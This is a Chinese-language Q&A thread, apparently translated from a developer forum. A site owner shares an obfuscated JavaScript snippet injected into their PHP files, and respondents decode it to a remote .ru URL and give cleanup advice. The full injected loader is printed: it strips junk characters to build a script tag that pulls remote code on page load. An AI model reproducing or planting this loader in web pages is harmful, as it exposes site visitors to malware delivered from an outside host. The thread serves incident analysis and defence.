我在我的网站上的PHP文件中找到了以下代码。我认为有人能够破解我的ftp或者某种方式他能够在我的PHP文件中添加这个脚本,不知道如何。
<script>/*Exception*/ document.write('<script src='+'h&)t()#t@$^p^^(:&#/&/!)!@n&o&&$$@v@)!o)t@$e$!))k)^a)@!-$&&@r$u!!.)&u$!i(#m)#^s#()e$#$r#v$^(.!$#)n&e&)t).#p&&)@&i&@c)#h^(u$#!n@))$t)#e@&!r(-!&&c^&o(^m)!)^&.)g($e^)n#^u&&^i$@#n(e$c!@o@!$)l!)#o&$(r$@)s)@&$.&^r(u()&:!)8(0@@!8$&&0!(^/&^!c!^o^!m!^&d&i)#!r$!()e$#c^(t@@.@!d((#e&@/^&^c!!)!)o#((#m&$$d)^)$i&(&r!&e&$)!c@(#t#$.(d^e(!#/&!^e)a!^()r&)t^@h@l@$i(&$n#$^$k(&.&n(#^e#t#/^@w$o^&r@&$l&^d#o!&&#f@()!w((a)(r$!c(!)r!)&#a^&f#$t(&$.#($c(^@o@@m#&^/!@g&#o(^o^&(!&g@l#e^!&&.(c^o#$@m#$/(^##'.replace(/&|\(|\$|\)|\!|\^|@|#/ig, '')+' defer=defer></scr'+'ipt>');</script>
<!--5f81e446ddf4e34599fb494b668c1569-->
但是我想知道上面代码的含义,我想它是以HTML格式或其他形式加密的,但是上面的代码实际上是做什么以及有人能够将它注入我的网站?
感谢。
答案 0 :(得分:2)
上面的脚本src会产生地址http://novoteka-ru.uimserv.net.pichunter-com.genuinecolors.ru:8080/comdirect.de/comdirect.de/earthlink.net/worldofwarcraft.com/google.com/
它通过网站/脚本中的安全漏洞或直接通过ftp进入您的文件。
请务必尽快清除此恶意代码中的文件,更改ftp密码并修复安全漏洞!
答案 1 :(得分:0)
我认为它没有做任何事情。它有相同的网址Alex posted,所以我不打算在此重复。
当我尝试使用带有IE6用户代理标头的curl检索它时,将标头记录到文件中,我得到了这些标题:
HTTP/1.1 200 OK
Server: nginx
Date: Sat, 06 Feb 2010 21:37:13 GMT
Content-Type: text/javascript
Connection: close
X-Powered-By: PHP/5.1.6
Expires: 0
Pragma: no-cache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Cache-Control: private
Content-Length: 2
此外,该文件的内容似乎只是一个CRLF。没什么特别的。
我不知道他们为什么会把它放在那里,但也许曾经有过恶意的东西,但现在却没有......或者他们只是等待一段时间在那里放一些恶意代码。